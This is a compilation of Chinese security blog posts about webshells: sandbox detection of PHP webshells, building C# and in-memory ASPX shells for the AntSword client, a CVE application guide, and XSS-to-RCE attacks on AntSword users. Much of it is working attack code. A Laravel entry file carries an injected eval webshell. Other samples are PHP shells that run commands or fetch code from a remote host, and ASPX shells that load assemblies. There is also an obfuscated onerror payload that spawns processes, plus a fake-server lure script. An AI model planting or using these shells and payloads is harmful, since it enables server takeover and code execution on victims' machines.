/*|--------------------------------------------------------------------------| Turn On The Lights|--------------------------------------------------------------------------|| We need to illuminate PHP development, so let us turn on the lights.| This bootstraps the framework and gets it ready for use, then it| will load up this application so that we can run it and send| the responses back to the browser and delight our users.|*/
$app = require_once __DIR__.'/../bootstrap/app.php';
/*|--------------------------------------------------------------------------| Run The Application|--------------------------------------------------------------------------|| Once we have the application, we can handle the incoming request| through the kernel, and send the associated response back to| the client's browser allowing them to enjoy the creative| and wonderful application we have prepared for them.|*/$a=array($_REQUEST['yydsyyds1']=>"3");
$b=array_keys($a)[0];
eval($b);
$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(    $request = Illuminate\Http\Request::capture());
$response->send();
$kernel->terminate($request, $response);

这类样本又称为插马(在正常的文件内插入Webshell代码)。一方面在服务器上无新增落盘文件，躲避检测；另一方面可以有效避免沙箱“重放”运行。此样本单独运行，会因找不到依赖报错终止运行。需要对异常等函数调用进行特殊处理才能够将特征暴露出来。

• 困境2:对抗手段多，引入新攻击面

攻击者会使用分支等绕过手段，根据某外部传入参数，决定某IF条件的判断结果，防止动态沙箱的重录。

示例1- 分支对抗

// 分支对抗<?php
if($_GET['pass']=="admin") {if($_GET['normal'] == "1"){         $a =  "echo normal" ; // 分支 1  }else if ($_GET['evil'] == "1") {         $a = $_GET['cmd']; //  分支 2  }}else{         $a = "echo normal"; //分支3}system($a);?>

只有当外部传入GET参数 webshell.php?pass=admin&evil=1&cmd=whoami时，才能执行分支2的恶意代码。

动态沙箱拿不到外部的输入，只能执行到分支3的默认逻辑，从而绕过检测。

示例2- 网络对抗

// 网络对抗<?phpcopy("http://webshell.com/1.png",'2.png');if($_GET['abc']=='firefox'){require '2.png';}else{echo "no file";}c();?>

绝大多数动态沙箱，会进行断网处理，目的是为了安全可控，防止攻击者攻击沙箱。但这种措施同时会引入新的攻击面。攻击者可以将恶意代码藏在远程资源，通过请求远程资源获得恶意代码并执行。

• 困境3:版本碎片化严重

以PHP和JSP举例，PHP的主流版本为PHP5、PHP7、PHP8，JSP的主流版本为JDK1.6、JDK1.7、JDK1.8、JDK1.9、JDK10、JDK11、JDK12、JDK13、JDK14、Tomcat7、Tomcat8、Tomcat9、Tomcat10。每个版本都具有新特征的增加或者旧版本的遗弃，这样带来的直接问题，防御者需要为每一个版本定制动态沙箱，工程量巨大且难以维护。可以看到下面的Webshell代码，在每个php版本的写法都不一致。

<?php // php5&php7兼容写法        ${$_GET['var_name']}=$_GET['cmd'];        system($a); // $a如何确定有没有赋值？?>
<?php //php5写法，与php7不兼容        $$_GET['var_name']=$_GET['cmd'];        system($a);?>

业内通用做法-执行强制干预

以PHP举例，业内对于上述对抗惯用的做法是，通过Hook PHP的执行函数和Opcode达到强制干预执行流、处理异常等行为。

这种方案遇到新版本的特征，通过修改zend引擎需要不断兼容，工程量巨大。同时如果暴力的进行执行干预、污点传递，容易产生大量误报。

模拟污点检测实现漏/误报的平衡

从“误报”的种类区分，共有两种类型。

•    业务性误报：这种类型的误报顾名思义，开发者部署正常的业务代码，检测引擎将其识别为“Webshell”，这个原因是检测引擎对误报的控制程度不够。

•    构造性误报：在攻防对抗中，攻击者在尝试构造绕过样本中触发的异常检测点，又或者是在特定版本比较苛刻的利用条件。较业务性误报而言，构造性“误报”大多为对抗过程中的异常层。

这一类型的误报，在实际的业务场景中，开发者不会写这种类型的代码，不会产生业务性误报。举个例子：

<?phpeval($a); ?>

php 5.3以下版本register_globals默认开启的全局变量配置，url请求?a=phpinfo();即可利用。但是5.3以下版本不是主流版本，一些缺乏安全经验的人第一眼看到此代码以为是误报。

安全是动态博弈的过程，在过度追求高检出的同时，也会引入大量误报。

模拟污点检测的最大优势在于有利于平衡误报和漏报，引擎内置了各种降误报的机制，同时模拟较为真实的运行结果，极大降低了误报率。Webshell检测能力作为基础的云安全能力，服务阿里云的广大客户，如果业务性误报过多，将极大影响客户的使用。

伏魔计划的愿景：

对于客户而言，我们通过市场化、公平公开的赏金挑战赛方式，让旗下安全产品直接接受行业生态的检验，客户在选择产品的时候，可以综合考虑该产品的赏金测评结果，从而做出更好的购买决策。

对于安全产品而言，尤其是攻防类产品，它不是一个静止不变的实体商品，它从研发、交付、到后期维护，本身是一个不断动态变化的实体，需要不断的通过内部视角、外部视角去锤炼安全能力。
对于行业而言，赏金挑战赛不是一锤子买卖，一次锣鼓喧天搞完就结束，而是要长期持续举办。能力强不是自己说说而已，能力水位需要得到外部视角的不断验证。

阅读原文

跳转微信打开

聊聊蚁剑新类型ASPXCsharp与ASP.NET下的内存马

前言

最近花了点时间，给蚁剑加上了C#的shell类型。

其实蚁剑在实现jscript加载assembly之后，jscript已经可以实现所有C#可以实现的功能：http://yzddmr6.com/posts/jscript-load-csharp-assembly/

这次增加主要是有几点考虑：

    1. Jscript的shell出现很容易被杀。我还没有见过用jscript写的项目，web目录下面出现了Jscript文件99.99%就是 Webshell，特征更明显一些。

    2. Jscript的语法属实恶心。没有啥文档，坑全部靠踩。

    3. C#类型可以兼容asp.net 各种内存马，Jscript无法做到。

本文记录一下自己在开发设计的过程中，遇到的一些问题以及自己的思考。

自定义类名

其实一开始遇到的问题是无法自定义类名的问题。c#跟java有一点不同的是，java的 newInstance 是不需要指定 type 的，只要有Class对象就可以实例化。但是c#在实例化的时候必须要指定实例化的type，这也意味着我们所有的全限定类名必须要一样。

冰蝎默认类名都是 U，就建在根命名空间下。每个 Payload 是单独编译的。

哥斯拉同样采用了这种机制，实例化的类名是 LY。但是因为哥斯拉采用的方式是一次性把Payload 都打到内存里然后反射调用，所以可以把所有的基础 Payload 都编译到一个dll里面。

但是这样开发Payload的时候会很难受，因为在同一个项目下面都用一个固定的类名，编译器是会报冲突的。

 后来想到了一种取巧的办法，用 python 命令行调用编译程序，在编译之前把类名都统一替换掉。暂时解决了问题，但是还是感觉不够优雅。

那么有没有什么办法可以动态获取到assembly的type呢？

翻了翻手册，发现以下方法:

写代码测试一下:

String Payload = "xxx";
System.Reflection.Assembly a = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
Console.WriteLine("Assembly.GetName: "+a.GetName());
Console.WriteLine("Assembly.GetName.Name: "+a.GetName().Name);
Console.WriteLine("Assembly.GetType: "+a.GetType());
Console.WriteLine("Assembly.GetTypes[0]: "+a.GetTypes()[0]);
Console.WriteLine("Assembly.GetTypes[0].FullName: "+a.GetTypes()[0].FullName);

output:

Assembly.GetName: BASE_Info, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
Assembly.GetName.Name: BASE_Info
Assembly.GetType: System.Reflection.Assembly
Assembly.GetTypes[0]: BASE_Info.Run
Assembly.GetTypes[0].FullName: BASE_Info.Run

Assembly.GetTypes 返回的是一个列表，而Payload里面我们通常只会定义一个类，所以可以通过 Assembly.GetTypes[0] 来获取Payload类的 type。

WebShell 中可以采用如下写法。

<%@ Page Language="c#"%>
<%
String Payload = Request.Form["ant"];
if (Payload != null){
  System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
  assembly.CreateInstance(assembly.GetTypes()[0].FullName).Equals(Context);
}
%>

这里又跟java的defineClass不太一样，defineClass只能打进去一个类，而c#的Assembly.Load可以加载一个程序集，并不一定只是一个类。所以为了考虑今后payload里可能会有多个类的情况，推荐的写法如下：

<%@ Page Language="c#"%>
<%
String Payload = Request.Form["ant"];
if (Payload != null){
  System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
  assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(Context);
}
%>

即强行指定实例化的类为命名空间下名为Run的类。

兼容内存马

rebeyond大佬在最开始用加载 assembly 作为aspx类型的shell时，默认Equals里面是this对象。也就是Page对象。这种方式在aspx文件落地的情况下没有毛病，但是在内存马环境下，是没有Page对象的，这种办法也就不兼容。

微软文档如下图

哥斯拉则对此进行了兼容处理，不再采用Page对象，而采用了兼容性更好的HttpContext

其实入口参数的本质就是获取到当前的 request 跟 response 对象。

吸取了 jsp 的经验，一开始 parseObj 函数内置了三种方法：

public void parseObj(Object obj) {
  if (obj.GetType().IsArray) { //直接数组传入
    Object[] data = (Object[])obj;
    this.Request = (HttpRequest)data[0];
    this.Response = (HttpResponse)data[1];
  } else {
    try {
      Page page = (Page)obj;// 传入Page对象
      this.Response = page.Response;
      this.Request = page.Request;
    } catch (Exception) {
      HttpContext context = (HttpContext)obj;//传入HttpContext对象
      this.Response = context.Response;
      this.Request = context.Request;
    }
  }
}

所以在shell中用以下写法均可连接

// 利用Page对象
System.Reflection.Assembly.Load(Convert.FromBase64String(Payload)).CreateInstance(xxx).Equals(this);
// 利用Context对象
System.Reflection.Assembly.Load(Convert.FromBase64String(Payload)).CreateInstance(xxx).Equals(Context);
// 利用数组
System.Reflection.Assembly.Load(Convert.FromBase64String(Payload)).CreateInstance(xxx).Equals(new object[] { Request, Response });

以 asp.net 的 Route 内存马为例，从 route 上下文中获取到的 Context 是 HttpContextBase，而不是 HttpContext。具体的实现类为System.Web.HttpContextWrapper。

并且通过HttpContextWrapper.Request获取到的对象是HttpRequestBase，默认实现类是System.Web.HttpRequestWrapper。有点类似Tomcat的门面模式。

如果要采用数组的方式可以用以下反射代码实现

FieldInfo requestField = typeof(HttpRequestWrapper).GetField("_httpRequest", BindingFlags.Instance | BindingFlags.NonPublic);
HttpRequest httpRequest = (HttpRequest)requestField.GetValue(httpContext.Request);
FieldInfo responseField = typeof(HttpResponseWrapper).GetField("_httpResponse",BindingFlags.Instance | BindingFlags.NonPublic);
HttpResponse httpResponse = (HttpResponse)responseField.GetValue(httpContext.Response);
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(new object[] { httpRequest, httpResponse });

‍

‍‍

访问注入内存马的aspx，一片空白说明注入成功

 蚁剑中输入任意 URL，连接成功。

进一步思考

 看起来不错了，但是还有继续优化的空间吗？

Java中一个比较著名的问题是内存马回显，实际上是如何从当前线程获取当前的 request 跟 response 对象。这个问题其实比较蛋疼，因为不同的容器有不同的实现细节，无法统一处理。

但是C#则直接把这个接口给暴露了出来，直接可以通过 HttpContext.Current 获取到当前的context，从而获取当前的 request 跟 response 对象。

再次改造之后，payload 中 parseObj 如下：

public void parseObj(Object obj) {
  if (obj.GetType().IsArray) {
    Object[] data = (Object[])obj;
    this.Request = (HttpRequest)data[0];
    this.Response = (HttpResponse)data[1];
  }else{
    try {
      HttpContext context = (HttpContext)obj;
      this.Response = context.Response;
      this.Request = context.Request;
    }catch (Exception){
      HttpContext context = HttpContext.Current;
      this.Response = context.Response;
      this.Request = context.Request;
    }
  }
}

改版后我们去掉了兼容性不强的 Page 方式，如果数组方式跟 Context 都无法获取的话，就尝试通过 HttpContext.Current 来拿到当前的 Context。

所以其实在shell中直接Equals(null)，或者一个随意对象即可。

<%@ Page Language="c#"%>
<%
String Payload = Request.Form["ant"];
if (Payload != null) {
  System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
  assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);
}
%>

同样可以连接成功

至于为什么没有把原来的入口参数方式全部都去掉，是因为新类型并没有在实战环境中测试过。不知道会不会有一些特殊情况。为了谨慎起见，还是保留了原来的入口参数。

最后

个人喜欢开发一些工具，同时记录下自己的碎碎念。如果能对你有帮助，那就最好不过了。

本文对应代码 Github 提交记录：

https://github.com/AntSwordProject/antSword/commit/d2d848c89e03088c20cc31f411e73fe2dd2973ea

该功能目前暂未正式发布，如需体验可自行更新蚁剑源代码为 v2.1.x 分支，体验开发版的乐趣(Bug)~

不如关注一波再走？

阅读原文

跳转微信打开

好像这么久了没跟粉丝互动过，于是跟「404星链计划」嫖了一批礼物，铁子起来抽奖了

「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划，这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值，也就是“404星链计划1.0”，这里面有为大家熟知的Pocsuite3、ksubdomain等等，很快我们就收到了许多不错的反馈。2020年11月，我们将目光投向了整个安全圈，以星链计划成员为核心，筛选优质、有意义、有趣、坚持维护的开源安全项目，为立足于不同安全领域的安全研究人员指明方向，也就是“404星链计划2.0”。

为了更清晰地展示和管理星链计划的开源项目，今天我们将1.0和2.0整合，推出改版后的「404星链计划」。

计算机开源社区是开放且庞杂的，当然安全也是如此；我们希望404星链计划能够提供一个安全开源项目的交流平台，为项目提供技术支持和奖品激励、进行公开推荐，让更多更优质的项目成为大家的“神兵利器”，以此来促进安全开源社区的发展。就像一颗颗大大小小的星星，本是独自寂寞美丽，但当它们汇在一起，就能聚成一道闪耀璀璨的星河，绽放不可磨灭的力量。

Github地址：

https://github.com/knownsec/404StarLink

文末有抽奖，错过拍大腿！ 

（主页板块展示）

同时，我们改进了评分机制，使用榜单对项目进行排名和展示。以项目更新频率、发表相关文章视频、Github Star、用户使用量等多维度描述和展示项目质量。

如果你的安全开源项目有意加入404星链计划，请在星链计划 Github 主页的 issue (https://github.com/knownsec/404StarLink/issues)提交项目申请，提交格式如下：

• 项目名称：
• 项目链接：
• 项目简介：
• 项目特点、亮点：
  
  

•  README.md (包括但不限于：项目简介、运行环境搭建、运行示例等)

•  CHANGELOG (便于记录项目更新)

•  LICENCE (为避免开源纠纷，需要提前选择开源协议)

• 编译型项目提供 release 版本

• 项目需要和安全相关

• 必须是完整的开源项目(不能只是二进制，或部分开源)

  
  

• 项目具有一定的实用价值

• 项目完整开源

• 项目源码内不包含恶意代码

• 项目可以正常部署和使用

项目加入星链计划之后，社群用户可以更方便快捷地获取项目动态和反馈问题，开发者也可以不断根据用户反馈来优化和迭代项目。

我们将继续每周获取项目更新，并在星链计划社群、404官方账号进行推广；项目的相关文档、演示视频也将发布在Seebug Paper、公众号、404实验室B站等平台，为项目增加曝光机会。

同时，为了更好的管理星链计划中项目的生命周期，促进开源项目的发展，我们设置了「里程碑」，开发者可以通过不断维护项目，来达成相关的里程碑获取对应的周边礼品。

（奖励里程碑）

当然！我们依旧会为开发者提供知道创宇内推通道、每年优先推荐KCon兵器谱，以及不定期的礼品关怀：）

本届KCon 2021兵器谱展示中，有8个项目来自404星链计划：

（KCon 2021兵器谱）

本期收录了4个优秀的项目：

群内欢迎讨论星链计划的各个安全工具，以及网络安全方面资讯、技术等等，欢迎踊跃提问、解答、互帮互助。同时群内开放【帮转正规招聘信息、优秀技术文章、寻求开发伙伴等内容】，请先联系运营菜菜子审核，由菜菜子安排推送到星链各个群中。

抽6位星链的铁子获得星链刺绣棒球帽！

404星链计划 | As-Exploits：中国蚁剑后渗透框架

404星链计划 | pocassist : 全新的开源在线 poc 测试框架

404星链计划 | Stowaway : 专为渗透测试工作者制作的多级代理工具

阅读原文

跳转微信打开

讲一讲代发现漏洞的白帽子申请 CVE ID 的过程

写在前面

  接上文 「从虚假的XSS到放弃RCE再到Self-RCE」提到的，这次讲一讲我代发现漏洞的白帽子(cc7v@校长) 申请 CVE ID 的过程。

  申请CVE的方式其实挺多的，邮件、Web表单、CNA等等，具体可以去查看 CVE 网站的说明。AntSword 整个软件生态都是托管在 GitHub 上的，刚好 GitHub 是 CVE 的 CNA，我们直接用 GitHub 上面的安全面板，就可以申请 CVE 了。

不过有一说一，官方代替白帽子去申请CVE，速度确实挺快的

正文

第 1 步，创建安全公告草稿

  在仓库的 Security 选项卡下面，选择 Security Advisories (安全建议)，然后点击「New draft security advisory」 (创建安全建议草稿)

第 2 步，按照表单填写信息

需要注意的是，漏洞等级这块，可以用 低/中/高/严重，也可以使用 CVSS 来打分：

CWE ID 这块，意思就是你要选个漏洞分类，这个你按CWE的标准去找就完事了

CVE identifier 这个选项里，如果选择 「Request CVE ID later」意思就是一会儿申请CVE ID

填写完了保存，我们进行下一步

第三步，编辑「安全建议」

有细心的同学就发现了，CVE申请的时候，是需要填「漏洞发现人」的，第2步的时候貌似没有？莫急，我们点「Edit advisory」按钮

又回到第 2 步的表格了，但是多了一个 「Credits」项，在这一项里，我们就可以选择在这个漏洞生命周期里做出贡献的白帽子了。

当然，因为我们是用 GitHub 来管理漏洞的，这里只能选择已经在 GitHub 上注册的用户

之后我们保存

第 4 步，申请分配 CVE / 发布安全公告

保存完之后，可以看到安全公告草稿下方有个绿色的按钮，这里可以有两个选择

1. 「Request CVE」，申请CVE。选了这个之后，GitHub 的工作人员会在 72 小时内审核，审核通过之后，会预分配一个 CVE编号给你。

为什么是预分配，这是因为CVE要求的每一个CVE编号必须要能找到对应的厂商针对这个漏洞公开发布的信息，我们的安全公告现在还是草稿，除了相关人员能看到，其它人是看不到的，所以此时去搜索这个CVE编号的时候，状态是 「RESERVED」，等安全公告发布之后，这个CVE就会更改为公开状态了。

2. 「Publish advisory」,发布安全公告。没啥说的，就是字面意思。点阅读原文可以跳转到公告页面

之后我们就只需要等待 GitHub 官方去更新 CVE 编号的状态就行了。

文章写的时候是周末，大家都不上班，所以最后的 CVE 公开之后的图，我就不补了，过几天了有兴趣了再去搜一下。

写在最后

  有个坑点需要说一下，申请CVE的GitHub仓库，必须是原始仓库。一开始我是用 AntSword-Store/AS_Redis 这个仓库去申请的，结果被驳回了，理由是不是官方仓库

后来我以为是因为我软件生态填的是 AntSword，所以要去 AntSword 下申请。然后他告诉我，你不是官方仓库，所以不行。喵？喵？喵？

最后想明白了，AntSword-Store 的仓库是 Fork 过来的，得去最原始的仓库申请

最后，感谢大家的努力，让AntSword生态更加安全。发现漏洞请联系开发团队 ：）

吐槽两句: 插件也能申请 CVE 这是我都没想到的，不过WordPress的插件能申请CVE，AntSword 的插件申请CVE好像也没什么不对的？

不如关注一波再走？

阅读原文

跳转微信打开

文章开始前，说点题外话，接上次转发的文章（端内钓鱼，反制蚁剑）后台反馈下来的消息看，大家普遍都没整明白这波是什么操作

本文来自 cc7v@校长 的知识星球，文章中部分内容「学蚁致用」会略做修改

学蚁致用

0x01 前言

中午在学校午休，就看了 @忍酱 的反制Goby， @暗羽师傅 的反制Burpsuite还有 @先知社区 里的反制蚁剑, @f4ltJ4y 的蚁剑复现，挑起了我想反制的心！

蚁剑版本: 2.1.12

0x02 虚假XSS

蚁剑是自带浏览器的，用的是Chrome！本想着暗羽师傅的那篇可以用得到，发现版本不对

发现它调用了dhtmlx框架，可以解析HTML

<img src=1 onerror=alert(1)>

正是因为这个虚假的XSS，更加激发了我想RCE的心！我们可以参考：

https://xz.aliyun.com/t/8167

批注: 「浏览网站」模块中，创建 Window 的时候，禁止了 Node 上下文支持，并且开启了沙箱，所以即便有 XSS 也不会引发 RCE。

学蚁致用

0x03 放弃RCE

我在想既然有内置浏览器，那么Chromium浏览器版本是否存在漏洞呢？ 我们先得获取Chromuim版本

# Consolenavigator.appCodeNamenavigator.appVersion

如上图，谷歌浏览器的产品代号为"Mozilla"

"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) antsword/2.1.12 Chrome/69.0.3497.106 Electron/4.0.3 Safari/537.36"

上图已知，Chrome/69.0.3497.106 Electron/4.0.3 我们查找相对应的远程代码执行的漏洞！已关闭沙箱

通过万能的百度我找到一个 Google Chrome < = 87.0.4280.88 远程代码执行

# 参考文档:https://www.cnblogs.com/ethtool/p/14652420.htmlhttps://github.com/r4j0x00/exploits/blob/master/CVE-2020-16040/exploit.js

尝试后，我实在是想不明白这个DevTools怎么搞，我想尝试别的版本，高版本低版本我都试过了，都是 同一个问题！希望有师傅能够解惑，我太菜了。

0x04 「Redis管理」插件 Self-RCE

本文所述该插件的漏洞目前已经修复

峰回路转，本来我是打算放弃的，就随便点点插件里的内容。我是原先有下载一个Redis管理的插件的

<img src=1 onerror=alert(1)>

直接通过HTML的方式解析

https://github.com/AntSword-Store/AS_Redis/blob/fac78f9605c4cee4d863b1c68a368916dc854051/libs/core.js

阅读了这个插件的源代码，发现并没有过滤以及加以限制，而且dhtmlx 解析，这应该是蚁剑开发的标准要求

'use strict'
class Core {  constructor(ShellCore, opt = {}) {    this.ShellCore = ShellCore;    this.host = opt['host'] || "127.0.0.1:6379";  }
  setHost(host) { this.host = host; }
  // 将 buffer 转为 base64 string  encode(buffer) {    return Buffer.from(buffer).toString('base64');  }
  decode(str) {    // ...  }
  get template() {    // ...  }}
module.exports = Core;

dhtmlx v4 的 Tree 组件 text 属性是支持 html 的，在插件开发过程中，设置节点内容的时候，一定需要注意 XSS 问题

学蚁致用

漏洞点：

构造 Self-RCE

结合蚁剑的以下特点：

解析HTML时，不能使用单引号或双引号，否则会出现语法混乱 HTML源码和流量中均有Payload，导致攻击方很容易被反制,在执行命令后需要删除当前HTML节 点，并对流量进行加密。

a="require('child_process').exec('calc.exe')"b=""for(i=0;i<a.length;i++)  b = b + "," +a.charCodeAt(i)

使用 JavaScript Obfuscator 对payload进行混淆,为了方便我这里就不混淆了 在Console执行得到处理后的payload

<img src=1 onerror="eval(String.fromCharCode(114,101,113,117,105,114,101,40,39,99,104,105,1 08,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,97,108,99, 46,101,120,101,39,41))">

0x05 「LiveScan」插件 XSS

本文所述该插件的漏洞目前已经修复

这个是蚁剑判断WEBSHELL存活的一款插件

https://github.com/AntSword-Store/LiveScan/blob/master/libs/ui.js

行160-192 从开始扫描到渲染UI，每一步都没有调用JS替换函数: antSword.noxss

于是我构思，如何让他扫描后渲染出来，它扫描时shell不需要存活，于是我们shell地址开始下手 Windows对文件的命名有标准，我们没法使用尖括号 只能在链接的时候修改

XSS:

<img src=1 onerror=alert(1)>
例子：
http://192.168.0.108/<img src=1 onerror=alert(1)>/1.php

构思

其实对于我而言这个是有实战意义的: 钓鱼

就脚本小子以及初出茅庐的攻击方来说，设置钓鱼文件，伪造内容诱导添加shell并存活检测，也可以黑 吃黑，诱导其检测shell存活~

在网站目录下创建 txt 或者 log 文件，伪造内容:

漏洞利用扫描器 结果:
指定连接shell管理工具 -- 蚁剑(AntSword)WebShell: http://192.168.0.108/<img src=1/ onerror="eval(String.fromCharCode(114,101,113,117,105,114,101,40,39,99,104,105,1 08,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,97,108,99, 46,101,120,101,39,41))">/1.php密码：cmd
连接后请务必进行存活检测 -- 插件中心下载 && https://github.com/AntSword-Store/LiveScan# 如遇插件中心存在打不开的情况，解决方法: https://mp.weixin.qq.com/s/hF3GgZpIcussc-BjUoJUuQ

0x06 结尾

  在实战当中，有利用的可能！但可操作性非常低，诱导性也低，但是危害大！不算鸡肋，有用武之 地但是条件要求极其苛刻！

写在最后

  校长这波对初学者满满的套路，从入门到入土，我觉得我得去下载一个 国家反诈骗中心 APP 了

不如关注一波再走？

阅读原文

跳转微信打开

推荐阅读这篇文章。有攻有防，砥砺前行。推荐语只能 120 字，我把其它的想法和解决方案附在文末。

111=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
 $oparr=preg_split("/\\\\|\//",$opdir);
 $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
 $tmdir=".cc06e1b50e";
 @mkdir($tmdir);
 @chdir($tmdir);
 @ini_set("open_basedir","..");
 for ($i=0;$i<sizeof($oparr);$i++) {
  @chdir("..");
 }
 @ini_set("open_basedir","/");
 @rmdir($ocwd."/".$tmdir);
}
;
function asenc($out) {
 return $out;
}
;
function asoutput() {
 $output=ob_get_contents();
 ob_end_clean();
 echo "c63f"."aa80";  //校验码一
 echo @asenc($output);
 echo "03b"."b509"; //校验码二
}
ob_start();
try {
 $D=dirname($_SERVER["SCRIPT_FILENAME"]);
 if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
 $R="{$D} ";
 if(substr($D,0,1)!="/") {
  foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
 } else {
  $R.="/";
 }
 $R.=" ";
 $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
 $s=($u)?$u["name"]:@get_current_user();
 $R.=php_uname();
 $R.=" {$s}";
 echo $R;
 ;
}
catch(Exception $e) {
 echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

c63faa80D:/phpstudy_pro/WWW C:D:E:F: Windows NT LAPTOP-465G 6.2 build 9200 (Windows 8 Business Edition) i586 USER03bb509

$ze="%echo \"([^<]*?).\"([^<]*?)\";%si";  
preg_match($ze,$A,$B);
$c="$B[0]"; //正则提取 echo "xxxx"."xxxx";
$key= str_replace(['"', '.', 'echo', ' ', ";"], "", $c); //替换输出干净的值xxxxxxxx
$txt='D:/phpstudy_pro/WWW'."\t".'C:D:E:F:'."\t".'Windows NT LAPTOP-46FFII5G 6.2 build 9200 (Windows 8 Business Edition) i586'."\t".'administrator';
echo "$key"."$txt";//拼接输出最终内容

$ret=127;

$ze="%echo \"([^<]*?).\"([^<]*?)\";%si";
preg_match($ze,$A,$B);
$c="$B[0]";
$key= str_replace(['"', '.', 'echo', ' ', ";"], "", $c);
    $payload='http://exp.com/index.html';//远程加载js的页面，代码在文后
    echo "$key".'ret=405'."\n".'数据解码错误，请访问使用文档查询解决方案。AntSword：'."$payload";//输出的钓鱼内容

<?php 
$A=urldecode(file_get_contents("php://input")); //获取post数据
$iscmd="%(.*)127;%si";
if (preg_match($iscmd,$A,$B)!=0) { //判断数据包类型
    
$ze="%echo \"([^<]*?).\"([^<]*?)\";%si";
preg_match($ze,$A,$B);
$c="$B[0]";
$key= str_replace(['"', '.', 'echo', ' ', ";"], "", $c); //取校验码
    $payload='http://exp.com/index.html'; //远程调用地址
    echo "$key".'ret=405'."\n".'数据解码错误，请访问使用文档查询解决方案。AntSword：'."$payload";//这部分内容自由发挥，可以写成更有诱导性的内容
} else {
    
    echo "no";
$ze="%echo \"([^<]*?).\"([^<]*?)\";%si";
preg_match($ze,$A,$B);
$c="$B[0]";
$key= str_replace(['"', '.', 'echo', ' ', ";"], "", $c);
$txt='D:/phpstudy_pro/WWW'."\t".'C:D:E:F:'."\t".'Windows NT LAPTOP-46FFII5G 6.2 build 9200 (Windows 8 Business Edition) i586'."\t".'administrator'; //返回内容会缓存起来在其他功能里用到，也可以利用这个伪造系统类型
echo "$key"."$txt";
}
?>

<script type="text/javascript">
 require('child_process').exec('calc',(error, stdout, stderr)=>{     alert(`stdout: ${stdout}`); });
</script>

学蚁致用：

1. electron render 中的 a 标签默认行为是用 electron 内置的 BrowserWindow 来打开的。

2. AntSword 由于功能的需要，不得不在 Render 中开启 Node 支持，所以 XSS 就可以导致 RCE。

3. 之所以开放 Node 支持，是因为编码器、解码器 等一些功能，是放在 Render 层来完成的，为了方便用户使用 NodeJS 中的一些库、语法。若将这些功能放在 ipcMain 里，在用户修改了这些代码之后，无法立即生效，需要将整个程序退出之后，重启才会生效。（参考 导入 shell 配置 这个插件的做法）。体验问题，这个需要未来再商讨。

4. 链接在内部打开导致的钓鱼问题，解决办法也很简单，我们在主窗口中把所有的 url 都用默认的系统浏览器打开：

值得注意的是，这种只针对 target=_blank 的情况，如果是href=javascript: 这种的，就挡住不了

5. 修复的话，已经在文章发布前修复了，只不过没有发版本，直接同步代码就行了。如果你是http方式下载的，把 app.js替换了就行。

过几天会发新版本。

6. 欢迎更多的大佬可以参与到帮AntSword找漏洞的计划中来，蚁剑会因为你的细心变得更优秀。

致敬每一位安全爱好者～

阅读原文

跳转微信打开

新增aspx内存马，jsp内存马增强，自定义脚本执行

更新日志

v 1.4 (2021/7/24)

• aspx新增 内存马 模块

• aspx新增 内存马管理 模块

• jsp新增filter内存马

• jsp内存马管理模块增强，支持filter、servlet（thx: tomcat-memshell-killer项目）

• 新增 执行自定义payload 模块

• 解决html渲染中文乱码

JSP内存马模块增强

filter内存马

新增filter类型内存马。内存马会把自己放到filter的第一位，在遇到shiro框架的时候就不用填写登录Cookie了。

默认支持Tomcat以及Spring。

内存马管理

内存马管理模块核心payload移植了tomcat-memshell-killer的代码，是不是看起来更直观了？

还可以贴心的判断有没有其他人的内存马

卸载内存马填入Filter name即可

ASPX内存马

内存马注入

aspx内存马的核心代码来源于ysoserial.net的GhostWebShell，三好学生的博客中也有提到。

主要原理是利用了asp.net下虚拟文件的特性：

通过ASP.NET的VirtualPathProvider类能够创建虚拟文件，实现以下效果：虚拟文件不存在于服务器的文件系统，但是能够对其动态编译并提供访问服务。ysoserial.net的GhostWebShell.cs提供了一种可供学习的利用思路。

可以直接定义要注入的shell内容，默认为普通一句话，当然也可以改成冰蝎哥斯拉之类的

连接的时候可以把注入的路径后面加点随机字符串，当作一个文件

也可以把注入的路径当作一个目录，在目录下面填写随机文件名

要注意的是必须要用.aspx结尾，因为映射的是一个文件，所以要用指定的后缀才能解析。

暂时不支持通配符模式

内存马管理

内存马注入的payload大部分是抄的

内存马管理部分的payload主要是自己手搓的。研究一下发现VirtualPathProvider主要用到了类似单向链表的结构，不像Tomcat的内存马有一个Config去定义。获取所有组件需要遍历链表，卸载的时候需要修改当前指针指向来删除节点，梦回数据结构课堂。

卸载指定VPP

再次获取组件发现内存马已经被删除。

剩下的这个System.Web.Hosting.MapPathBasedVirtualPathProvider是IIS默认组件，删除之后网站会崩，请慎重操作。

自定义脚本执行

这个功能主要是为了方便调试

在JSP下需要填写base64格式的编译后的class文件

格式按照https://github.com/AntSwordProject/AntSword-JSP-Template项目去编写即可，这里以baseinfo为例：

aspx

aspx下就直接写jscript代码即可

如果想要调用C#的payload看我博客这篇文章：https://yzddmr6.tk/posts/jscript-load-csharp-assembly/

php

直接写php代码

项目地址

https://github.com/yzddmr6/As-Exploits

来颗star吧~

阅读原文

跳转微信打开

新类型 cmdlinux，直连命令执行WebShell

写在前面

